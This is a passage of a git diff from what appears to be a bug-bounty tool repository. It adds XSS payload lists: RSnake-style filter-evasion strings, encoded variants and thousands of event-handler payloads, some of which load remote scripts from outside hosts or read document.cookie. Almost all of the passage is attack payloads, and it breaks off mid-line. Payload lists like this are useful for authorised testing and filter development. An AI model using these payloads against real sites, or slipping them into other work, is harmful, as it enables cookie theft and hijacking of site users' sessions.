+&lt;STYLE&gt;@im\port'\ja\vasc\ript&#58;alert(\"XSS\")';&lt;/STYLE&gt; +&lt;IMG STYLE=\"xss&#58;expr/*XSS*/ession(alert('XSS'))\"&gt; +&lt;XSS STYLE=\"xss&#58;expression(alert('XSS'))\"&gt; +exp/*&lt;A STYLE='no\xss&#58;noxss(\"*//*\"); +xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(\"XSS\"))'&gt; +&lt;STYLE TYPE=\"text/javascript\"&gt;alert('XSS');&lt;/STYLE&gt; +&lt;STYLE&gt;&#46;XSS{background-image&#58;url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt; +&lt;STYLE type=\"text/css\"&gt;BODY{background&#58;url(\"javascript&#058;alert('XSS')\")}&lt;/STYLE&gt; +&lt;!--&#91;if gte IE 4&#93;&gt; +&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt; +&lt;!&#91;endif&#93;--&gt; +&lt;BASE HREF=\"javascript&#058;alert('XSS');//\"&gt; +&lt;OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/OBJECT&gt; +&lt;OBJECT classid=clsid&#58;ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript&#058;alert('XSS')&gt;&lt;/OBJECT&gt; +&lt;EMBED SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;swf\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt; +&lt;EMBED SRC=\"data&#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt; +a=\"get\"; +b=\"URL(\\"\"; +c=\"javascript&#058;\"; +d=\"alert('XSS');\\")\"; +eval(a+b+c+d); +&lt;HTML xmlns&#58;xss&gt;&lt;?import namespace=\"xss\" implementation=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;htc\"&gt;&lt;xss&#58;xss&gt;XSS&lt;/xss&#58;xss&gt;&lt;/HTML&gt; +&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&#91;&lt;IMG SRC=\"javas&#93;&#93;&gt;&lt;!&#91;CDATA&#91;cript&#58;alert('XSS');\"&gt;&#93;&#93;&gt; +&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt; +&lt;XML ID=\"xss\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\"javas&lt;!-- --&gt;cript&#58;alert('XSS')\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt; +&lt;SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"&gt;&lt;/SPAN&gt; +&lt;XML SRC=\"xsstest&#46;xml\" ID=I&gt;&lt;/XML&gt; +&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt; +&lt;HTML&gt;&lt;BODY&gt; +&lt;?xml&#58;namespace prefix=\"t\" ns=\"urn&#58;schemas-microsoft-com&#58;time\"&gt; +&lt;?import namespace=\"t\" implementation=\"#default#time2\"&gt; +&lt;t&#58;set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\"&gt; +&lt;/BODY&gt;&lt;/HTML&gt; +&lt;SCRIPT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;jpg\"&gt;&lt;/SCRIPT&gt; +&lt;!--#exec cmd=\"/bin/echo '&lt;SCR'\"--&gt;&lt;!--#exec cmd=\"/bin/echo 'IPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;'\"--&gt; +&lt;? echo('&lt;SCR)'; +echo('IPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;'); ?&gt; +&lt;IMG SRC=\"http&#58;//www&#46;thesiteyouareon&#46;com/somecommand&#46;php?somevariables=maliciouscode\"&gt; +Redirect 302 /a&#46;jpg http&#58;//victimsite&#46;com/admin&#46;asp&deleteuser +&lt;META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\"&gt; +&lt;HEAD&gt;&lt;META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +&lt;SCRIPT a=\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT =\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT a=\"&gt;\" '' SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT \"a='&gt;'\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT a=`&gt;` SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT a=\"&gt;'&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT&gt;document&#46;write(\"&lt;SCRI\");&lt;/SCRIPT&gt;PT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;A HREF=\"http&#58;//66&#46;102&#46;7&#46;147/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//1113982867/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//0x42&#46;0x0000066&#46;0x7&#46;0x93/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//0102&#46;0146&#46;0007&#46;00000223/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"htt p&#58;//6 6&#46;000146&#46;0x7&#46;147/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"//www&#46;google&#46;com/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"//google\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//ha&#46;ckers&#46;org@google\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//google&#58;ha&#46;ckers&#46;org\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//google&#46;com/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//www&#46;google&#46;com&#46;/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"javascript&#058;document&#46;location='http&#58;//www&#46;google&#46;com/'\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//www&#46;gohttp&#58;//www&#46;google&#46;com/ogle&#46;com/\"&gt;XSS&lt;/A&gt; +&lt; +%3C +&lt +&lt; +&LT +&LT; +&#60 +&#060 +&#0060 +&#00060 +&#000060 +&#0000060 +&lt; +&#x3c +&#x03c +&#x003c +&#x0003c +&#x00003c +&#x000003c +&#x3c; +&#x03c; +&#x003c; +&#x0003c; +&#x00003c; +&#x000003c; +&#X3c +&#X03c +&#X003c +&#X0003c +&#X00003c +&#X000003c +&#X3c; +&#X03c; +&#X003c; +&#X0003c; +&#X00003c; +&#X000003c; +&#x3C +&#x03C +&#x003C +&#x0003C +&#x00003C +&#x000003C +&#x3C; +&#x03C; +&#x003C; +&#x0003C; +&#x00003C; +&#x000003C; +&#X3C +&#X03C +&#X003C +&#X0003C +&#X00003C +&#X000003C +&#X3C; +&#X03C; +&#X003C; +&#X0003C; +&#X00003C; +&#X000003C; +\x3c +\x3C +\u003c +\u003C +&lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html&gt; +&lt;IMG SRC=\"javascript&#058;alert('XSS')\" +&lt;SCRIPT SRC=//ha&#46;ckers&#46;org/&#46;js&gt; +&lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js?&lt;B&gt; +&lt;&lt;SCRIPT&gt;alert(\"XSS\");//&lt;&lt;/SCRIPT&gt; +&lt;SCRIPT/SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;BODY onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/|\&#93;^`=alert(\"XSS\")&gt; +&lt;SCRIPT/XSS SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;IMG SRC=\" javascript&#058;alert('XSS');\"&gt; +perl -e 'print \"&lt;SCR\0IPT&gt;alert(\\"XSS\\")&lt;/SCR\0IPT&gt;\";' &gt; out +perl -e 'print \"&lt;IMG SRC=java\0script&#058;alert(\\"XSS\\")&gt;\";' &gt; out +&lt;IMG SRC=\"jav&#x0D;ascript&#058;alert('XSS');\"&gt; +&lt;IMG SRC=\"jav&#x0A;ascript&#058;alert('XSS');\"&gt; +&lt;IMG SRC=\"jav&#x09;ascript&#058;alert('XSS');\"&gt; +&lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&gt; +&lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041&gt; +&lt;IMG SRC=javascript&#058;alert('XSS')&gt; +&lt;IMG SRC=javascript&#058;alert(String&#46;fromCharCode(88,83,83))&gt; +&lt;IMG \"\"\"&gt;&lt;SCRIPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;\"&gt; +&lt;IMG SRC=`javascript&#058;alert(\"RSnake says, 'XSS'\")`&gt; +&lt;IMG SRC=javascript&#058;alert(&quot;XSS&quot;)&gt; +&lt;IMG SRC=JaVaScRiPt&#058;alert('XSS')&gt; +&lt;IMG SRC=javascript&#058;alert('XSS')&gt; +&lt;IMG SRC=\"javascript&#058;alert('XSS');\"&gt; +&lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt; +'';!--\"&lt;XSS&gt;=&{()} +';alert(String&#46;fromCharCode(88,83,83))//\';alert(String&#46;fromCharCode(88,83,83))//\";alert(String&#46;fromCharCode(88,83,83))//\\";alert(String&#46;fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\"&gt;'&gt;&lt;SCRIPT&gt;alert(String&#46;fromCharCode(88,83,83))&lt;/SCRIPT&gt; +';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +'';!--"<XSS>=&{()} +<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascrscriptipt:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<IMG SRC=" &#14; javascript:alert('XSS');"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<SCRIPT>a=/XSS/alert(a.source)</SCRIPT> +\";alert('XSS');// +</TITLE><SCRIPT>alert("XSS");</SCRIPT> +scriptalert(XSS)/script +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> +<TABLE BACKGROUND="javascript:alert('XSS')"> +<TABLE><TD BACKGROUND="javascript:alert('XSS')"> +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> +<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> +<DIV STYLE="width: expression(alert('XSS'));"> +<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> +<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> +<XSS STYLE="xss:expression(alert('XSS'))"> +exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'> +<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> +a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e); +<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"></BODY></HTML> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION +<form><button formaction="javascript:alert(123)">crosssitespt +<frameset onload=alert(123)> +<!--<img src="--><img src=x onerror=alert(123)//"> +<style><img src="</style><img src=x onerror=alert(123)//"> +<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> +<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> +<embed src="javascript:alert(1)"> +<? foo="><script>alert(1)</script>"> +<! foo="><script>alert(1)</script>"> +</ foo="><script>alert(1)</script>"> +<script>({0:#0=alert/#0#/#0#(123)})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script> +<script src="#">{alert(1)}</script>;1 +<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script> +<svg xmlns="#"><script>alert(1)</script></svg> +<svg onload="javascript:alert(123)" xmlns="#"></svg> +<iframe xmlns="#" src="javascript:alert(1)"></iframe> ++ADw-script+AD4-alert(document.location)+ADw-/script+AD4- +%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4- ++ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi- +%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi- +%253cscript%253ealert(document.cookie)%253c/script%253e +><s%2bcript>alert(document.cookie)</script> +><ScRiPt>alert(document.cookie)</script> +><<script>alert(document.cookie);//<</script> +foo<script>alert(document.cookie)</script> +<scr<script>ipt>alert(document.cookie)</scr</script>ipt> +%22/%3E%3CBODY%20onload=document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)%3E +; alert(document.cookie); var foo= +foo\; alert(document.cookie);//; +</script><script >alert(document.cookie)</script> +<img src=asdf onerror=alert(document.cookie)> +<BODY ONLOAD=alert(XSS)> +<script>alert(1)</script> +"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script> +<video src=1 onerror=alert(1)> +<audio src=1 onerror=alert(1)> \ No newline at end of file diff --git a/bounty_drive/attacks/xss/payloads/xss-payload-list.txt b/bounty_drive/attacks/xss/payloads/xss-payload-list.txt new file mode 100644 index 0000000..63ed92c --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/xss-payload-list.txt @@ -0,0 +1,6613 @@ +"-prompt(8)-" +'-prompt(8)-' +";a=prompt,a()// +';a=prompt,a()// +'-eval("window['pro'%2B'mpt'](8)")-' +"-eval("window['pro'%2B'mpt'](8)")-" +"onclick=prompt(8)>"@x.y +"onclick=prompt(8)><svg/onload=prompt(8)>"@x.y +<image/src/onerror=prompt(8)> +<img/src/onerror=prompt(8)> +<image src/onerror=prompt(8)> +<img src/onerror=prompt(8)> +<image src =q onerror=prompt(8)> +<img src =q onerror=prompt(8)> +</scrip</script>t><img src =q onerror=prompt(8)> +<svg onload=alert(1)> +"><svg onload=alert(1)// +"onmouseover=alert(1)// +"autofocus/onfocus=alert(1)// +'-alert(1)-' +'-alert(1)// +\'-alert(1)// +</script><svg onload=alert(1)> +<x contenteditable onblur=alert(1)>lose focus! +<x onclick=alert(1)>click this! +<x oncopy=alert(1)>copy this! +<x oncontextmenu=alert(1)>right click this! +<x oncut=alert(1)>copy this! +<x ondblclick=alert(1)>double click this! +<x ondrag=alert(1)>drag this! +<x contenteditable onfocus=alert(1)>focus this! +<x contenteditable oninput=alert(1)>input here! +<x contenteditable onkeydown=alert(1)>press any key! +<x contenteditable onkeypress=alert(1)>press any key! +<x contenteditable onkeyup=alert(1)>press any key! +<x onmousedown=alert(1)>click this! +<x onmousemove=alert(1)>hover this! +<x onmouseout=alert(1)>hover this! +<x onmouseover=alert(1)>hover this! +<x onmouseup=alert(1)>click this! +<x contenteditable onpaste=alert(1)>paste here! +<script>alert(1)// +<script>alert(1)<!– +<script src=//brutelogic.com.br/1.js> +<script src=//3334957647/1> +%3Cx onxxx=alert(1) +<%78 onxxx=1 +<x %6Fnxxx=1 +<x o%6Exxx=1 +<x on%78xx=1 +<x onxxx%3D1 +<X onxxx=1 +<x OnXxx=1 +<X OnXxx=1 +<x onxxx=1 onxxx=1 +<x/onxxx=1 +<x%09onxxx=1 +<x%0Aonxxx=1 +<x%0Conxxx=1 +<x%0Donxxx=1 +<x%2Fonxxx=1 +<x 1='1'onxxx=1 +<x 1="1"onxxx=1 +<x </onxxx=1 +<x 1=">" onxxx=1 +<http://onxxx%3D1/ +<x onxxx=alert(1) 1=' +<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)> +'onload=alert(1)><svg/1=' +'>alert(1)</script><script/1=' +*/alert(1)</script><script>/* +*/alert(1)">'onload="/*<svg/1=' +`-alert(1)">'onload="`<svg/1=' +*/</script>'>alert(1)/*<script/1=' +<script>alert(1)</script> +<script src=javascript:alert(1)> +<iframe src=javascript:alert(1)> +<embed src=javascript:alert(1)> +<a href=javascript:alert(1)>click +<math><brute href=javascript:alert(1)>click +<form action=javascript:alert(1)><input type=submit> +<isindex action=javascript:alert(1) type=submit value=click> +<form><button formaction=javascript:alert(1)>click +<form><input formaction=javascript:alert(1) type=submit value=click> +<form><input formaction=javascript:alert(1) type=image value=click> +<form><input formaction=javascript:alert(1) type=image src=SOURCE> +<isindex formaction=javascript:alert(1) type=submit value=click> +<object data=javascript:alert(1)> +<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;> +<svg><script xlink:href=data:,alert(1) /> +<math><brute xlink:href=javascript:alert(1)>click +<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&> +<html ontouchstart=alert(1)> +<html ontouchend=alert(1)> +<html ontouchmove=alert(1)> +<html ontouchcancel=alert(1)> +<body onorientationchange=alert(1)> +"><img src=1 onerror=alert(1)>.gif +<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/> +GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//; +<script src="data:&comma;alert(1)// +"><script src=data:&comma;alert(1)// +<script src="//brutelogic.com.br&sol;1.js&num; +"><script src=//brutelogic.com.br&sol;1.js&num; +<link rel=import href="data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; +"><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; +<base href=//0> +<script/src="data:&comma;eval(atob(location.hash.slice(1)))//#alert(1) +<body onload=alert(1)> +<body onpageshow=alert(1)> +<body onfocus=alert(1)> +<body onhashchange=alert(1)><a href=#x>click this!#x +<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x +<body onscroll=alert(1)><br><br><br><br> +<br><br><br><br><br><br><br><br><br><br> +<br><br><br><br><br><br><br><br><br><br> +<br><br><br><br><br><br><x id=x>#x +<body onresize=alert(1)>press F12! +<body onhelp=alert(1)>press F1! (MSIE) +<marquee onstart=alert(1)> +<marquee loop=1 width=0 onfinish=alert(1)> +<audio src onloadstart=alert(1)> +<video onloadstart=alert(1)><source> +<input autofocus onblur=alert(1)> +<keygen autofocus onfocus=alert(1)> +<form onsubmit=alert(1)><input type=submit> +<select onchange=alert(1)><option>1<option>2 +<menu id=x contextmenu=x onshow=alert(1)>right click me! +alert`1` +alert&lpar;1&rpar; +alert&#x28;1&#x29 +alert&#40;1&#41 +(alert)(1) +a=alert,a(1) +[1].find(alert) +top["al"+"ert"](1) +top[/al/.source+/ert/.source](1) +al\u0065rt(1) +top['al\145rt'](1) +top['al\x65rt'](1) +top[8680439..toString(30)](1) +navigator.vibrate(500) +eval(URL.slice(-8))>#alert(1) +eval(location.hash.slice(1)>#alert(1) +innerHTML=location.hash>#<script>alert(1)</script> +<a draggable="true" ondrag="alert(1)">test</a> +<a draggable="true" ondragend="alert(1)">test</a> +<a draggable="true" ondragenter="alert(1)">test</a> +<a draggable="true" ondragleave="alert(1)">test</a> +<a draggable="true" ondragstart="alert(1)">test</a> +<a id=x tabindex=1 onactivate=alert(1)></a> +<a id=x tabindex=1 onbeforeactivate=alert(1)></a> +<a id=x tabindex=1 onbeforedeactivate=alert(1)></a><input autofocus> +<a id=x tabindex=1 ondeactivate=alert(1)></a><input id=y autofocus> +<a id=x tabindex=1 onfocus=alert(1)></a> +<a id=x tabindex=1 onfocusin=alert(1)></a> +<a onbeforecopy="alert(1)" contenteditable>test</a> +<a onbeforecut="alert(1)" contenteditable>test</a> +<a onbeforepaste="alert(1)" contenteditable>test</a> +<a onblur=alert(1) tabindex=1 id=x></a><input autofocus> +<a onclick="alert(1)">test</a> +<a oncontextmenu="alert(1)">test</a> +<a oncopy="alert(1)" contenteditable>test</a> +<a oncut="alert(1)" contenteditable>test</a> +<a ondblclick="alert(1)">test</a> +<a onfocusout=alert(1) tabindex=1 id=x></a><input autofocus> +<a onkeydown="alert(1)" contenteditable>test</a> +<a onkeypress="alert(1)" contenteditable>test</a> +<a onkeyup="alert(1)" contenteditable>test</a> +<a onmousedown="alert(1)">test</a> +<a onmouseenter="alert(1)">test</a> +<a onmouseleave="alert(1)">test</a> +<a onmousemove="alert(1)">test</a> +<a onmouseout="alert(1)">test</a> +<a onmouseover="alert(1)">test</a> +<a onmouseup="alert(1)">test</a> +<a onpaste="alert(1)" contenteditable>test</a> +<abbr draggable="true" ondrag="alert(1)">test</abbr> +<abbr draggable="true" ondragend="alert(1)">test</abbr> +<abbr draggable="true" ondragenter="alert(1)">test</abbr> +<abbr draggable="true" ondragleave="alert(1)">test</abbr> +<abbr draggable="true" ondragstart="alert(1)">test</abbr> +<abbr id=x tabindex=1 onactivate=alert(1)></abbr> +<abbr id=x tabindex=1 onbeforeactivate=alert(1)></abbr> +<abbr id=x tabindex=1 onbeforedeactivate=alert(1)></abbr><input autofocus> +<abbr id=x tabindex=1 ondeactivate=alert(1)></abbr><input id=y autofocus> +<abbr id=x tabindex=1 onfocus=alert(1)></abbr> +<abbr id=x tabindex=1 onfocusin=alert(1)></abbr> +<abbr onbeforecopy="alert(1)" contenteditable>test</abbr> +<abbr onbeforecut="alert(1)" contenteditable>test</abbr> +<abbr onbeforepaste="alert(1)" contenteditable>test</abbr> +<abbr onblur=alert(1) tabindex=1 id=x></abbr><input autofocus> +<abbr onclick="alert(1)">test</abbr> +<abbr oncontextmenu="alert(1)">test</abbr> +<abbr oncopy="alert(1)" contenteditable>test</abbr> +<abbr oncut="alert(1)" contenteditable>test</abbr> +<abbr ondblclick="alert(1)">test</abbr> +<abbr onfocusout=alert(1) tabindex=1 id=x></abbr><input autofocus> +<abbr onkeydown="alert(1)" contenteditable>test</abbr> +<abbr onkeypress="alert(1)" contenteditable>test</abbr> +<abbr onkeyup="alert(1)" contenteditable>test</abbr> +<abbr onmousedown="alert(1)">test</abbr> +<abbr onmouseenter="alert(1)">test</abbr> +<abbr onmouseleave="alert(1)">test</abbr> +<abbr onmousemove="alert(1)">test</abbr> +<abbr onmouseout="alert(1)">test</abbr> +<abbr onmouseover="alert(1)">test</abbr> +<abbr onmouseup="alert(1)">test</abbr> +<abbr onpaste="alert(1)" contenteditable>test</abbr> +<acronym draggable="true" ondrag="alert(1)">test</acronym> +<acronym draggable="true" ondragend="alert(1)">test</acronym> +<acronym draggable="true" ondragenter="alert(1)">test</acronym> +<acronym draggable="true" ondragleave="alert(1)">test</acronym> +<acronym draggable="true" ondragstart="alert(1)">test</acronym> +<acronym id=x tabindex=1 onactivate=alert(1)></acronym> +<acronym id=x tabindex=1 onbeforeactivate=alert(1)></acronym> +<acronym id=x tabindex=1 onbeforedeactivate=alert(1)></acronym><input autofocus> +<acronym id=x tabindex=1 ondeactivate=alert(1)></acronym><input id=y autofocus> +<acronym id=x tabindex=1 onfocus=alert(1)></acronym> +<acronym id=x tabindex=1 onfocusin=alert(1)></acronym> +<acronym onbeforecopy="alert(1)" contenteditable>test</acronym> +<acronym onbeforecut="alert(1)" contenteditable>test</acronym> +<acronym onbeforepaste="alert(1)" contenteditable>test</acronym> +<acronym onblur=alert(1) tabindex=1 id=x></acronym><input autofocus> +<acronym onclick="alert(1)">test</acronym> +<acronym oncontextmenu="alert(1)">test</acronym> +<acronym oncopy="alert(1)" contenteditable>test</acronym> +<acronym oncut="alert(1)" contenteditable>test</acronym> +<acronym ondblclick="alert(1)">test</acronym> +<acronym onfocusout=alert(1) tabindex=1 id=x></acronym><input autofocus> +<acronym onkeydown="alert(1)" contenteditable>test</acronym> +<acronym onkeypress="alert(1)" contenteditable>test</acronym> +<acronym onkeyup="alert(1)" contenteditable>test</acronym> +<acronym onmousedown="alert(1)">test</acronym> +<acronym onmouseenter="alert(1)">test</acronym> +<acronym onmouseleave="alert(1)">test</acronym> +<acronym onmousemove="alert(1)">test</acronym> +<acronym onmouseout="alert(1)">test</acronym> +<acronym onmouseover="alert(1)">test</acronym> +<acronym onmouseup="alert(1)">test</acronym> +<acronym onpaste="alert(1)" contenteditable>test</acronym> +<address draggable="true" ondrag="alert(1)">test</address> +<address draggable="true" ondragend="alert(1)">test</address> +<address draggable="true" ondragenter="alert(1)">test</address> +<address draggable="true" ondragleave="alert(1)">test</address> +<address draggable="true" ondragstart="alert(1)">test</address> +<address id=x tabindex=1 onactivate=alert(1)></address> +<address id=x tabindex=1 onbeforeactivate=alert(1)></address> +<address id=x tabindex=1 onbeforedeactivate=alert(1)></address><input autofocus> +<address id=x tabindex=1 ondeactivate=alert(1)></address><input id=y autofocus> +<address id=x tabindex=1 onfocus=alert(1)></address> +<address id=x tabindex=1 onfocusin=alert(1)></address> +<address onbeforecopy="alert(1)" contenteditable>test</address> +<address onbeforecut="alert(1)" contenteditable>test</address> +<address onbeforepaste="alert(1)" contenteditable>test</address> +<address onblur=alert(1) tabindex=1 id=x></address><input autofocus> +<address onclick="alert(1)">test</address> +<address oncontextmenu="alert(1)">test</address> +<address oncopy="alert(1)" contenteditable>test</address> +<address oncut="alert(1)" contenteditable>test</address> +<address ondblclick="alert(1)">test</address> +<address onfocusout=alert(1) tabindex=1 id=x></address><input autofocus> +<address onkeydown="alert(1)" contenteditable>test</address> +<address onkeypress="alert(1)" contenteditable>test</address> +<address onkeyup="alert(1)" contenteditable>test</address> +<address onmousedown="alert(1)">test</address> +<address onmouseenter="alert(1)">test</address> +<address onmouseleave="alert(1)">test</address> +<address onmousemove="alert(1)">test</address> +<address onmouseout="alert(1)">test</address> +<address onmouseover="alert(1)">test</address> +<address onmouseup="alert(1)">test</address> +<address onpaste="alert(1)" contenteditable>test</address> +<applet draggable="true" ondrag="alert(1)">test</applet> +<applet draggable="true" ondragend="alert(1)">test</applet> +<applet draggable="true" ondragenter="alert(1)">test</applet> +<applet draggable="true" ondragleave="alert(1)">test</applet> +<applet draggable="true" ondragstart="alert(1)">test</applet> +<applet id=x tabindex=1 onactivate=alert(1)></applet> +<applet id=x tabindex=1 onbeforeactivate=alert(1)></applet> +<applet id=x tabindex=1 onbeforedeactivate=alert(1)></applet><input autofocus> +<applet id=x tabindex=1 ondeactivate=alert(1)></applet><input id=y autofocus> +<applet id=x tabindex=1 onfocus=alert(1)></applet> +<applet id=x tabindex=1 